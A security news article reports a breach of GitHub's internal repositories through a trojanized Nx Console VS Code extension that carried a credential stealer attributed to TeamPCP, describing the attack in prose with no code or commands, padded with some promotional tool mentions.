GitHub Breached via Malicious Nx Console Extension: 3,800 Repos Stolen

GitHub has officially confirmed that the breach of its internal repositories resulted from a compromise of an employee device involving a poisoned version of the Nx Console Microsoft Visual Studio Code (VS Code) extension. The attack, linked to the recent TanStack supply chain attack, allowed the cybercriminal group TeamPCP to exfiltrate approximately 3,800 repositories. GitHub's Chief Information Security Officer Alexis Wales stated there is no evidence of impact to customer information stored outside of internal repositories, though some internal repositories contain excerpts of customer support interactions. The company has taken steps to contain the incident and rotated critical secrets while continuing to monitor for follow-on activity. Other organizations impacted by the TanStack compromise include OpenAI, Mistral AI, and Grafana Labs. Organizations concerned about potential exposure can use email breach checker to determine if their information was involved in related incidents.

The malicious version of the VS Code extension, nrwl.angular-console, was live on the Visual Studio Marketplace for a mere 18 minutes between 12:30 p.m. and 12:48 p.m. UTC on May 18, 2026. According to OX Security researcher Nir Zadok, the trojanized extension appeared and behaved like the legitimate Nx Console but silently executed a shell command on startup that downloaded a hidden package from a planted commit on the official nrwl/nx GitHub repository. The command was disguised as a routine MCP setup task to avoid suspicion. This brief window was sufficient to distribute a credential stealer capable of harvesting sensitive data from 1Password vaults, Anthropic Claude Code configurations, npm, GitHub, and Amazon Web Services. Developers who may have installed the compromised extension should immediately rotate credentials and can verify their security posture using password strength checker and DNS leak test.

Jeff Cross, co-founder of Narwhal Technologies (nx.dev), acknowledged that the incident highlights the need for deeper, fundamental changes to how open source maintainers approach developer tooling security and distribution. The company has begun conversations with other high-profile open source maintainers about addressing structural problems in software supply chain security. TeamPCP has rapidly gained notoriety for large-scale supply chain attacks targeting widely-used open-source projects and security-adjacent tools. Organizations should review their privacy security checkup and ensure their development pipelines have proper SSL/TLS verification mechanisms in place. The assumption that the open source ecosystem has operated under for years—implicit trust in tooling and distribution channels—no longer holds in the face of sophisticated threat actors like TeamPCP.